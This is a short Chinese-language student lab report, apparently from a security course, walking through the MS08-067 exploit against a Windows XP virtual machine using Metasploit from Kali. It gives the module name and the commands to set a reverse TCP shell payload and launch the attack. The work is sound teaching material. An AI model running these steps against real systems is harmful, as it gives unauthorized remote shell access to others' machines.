MS08_067漏洞渗透攻击实践
-
前期准备
kali和winxp要ping通
-
kali开启msfconsole;
同时在这里可以看到目前可攻击载荷个数一共是471个,也可以看到其他攻击的数量如图。
-
用命令search ms08_067,查找渗透模块:
-
输入命令use exploit/windows/smb/ms08_067_netapi 后,就可以使用这个模块啦
-
show target可以看到可攻击靶机的操作系统型号
show payload可以看到有效的攻击载荷 为了和其他同学有所区分 我选择“windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager”,使用反向TCP shell,这个有效载荷会执行cmd.exe并通过连接回传,达到“远程访问”的目的。攻击效果中等难度
-
使用命令set payload windows/shell/reverse_tcp设置有关参数,并查看
-
确认无误后,用exploit命令开始攻击,成功获取权限
-
可以在winxp C盘下新建一个带有学号20145201的文件夹,之后再kali中查看,该文件夹存在
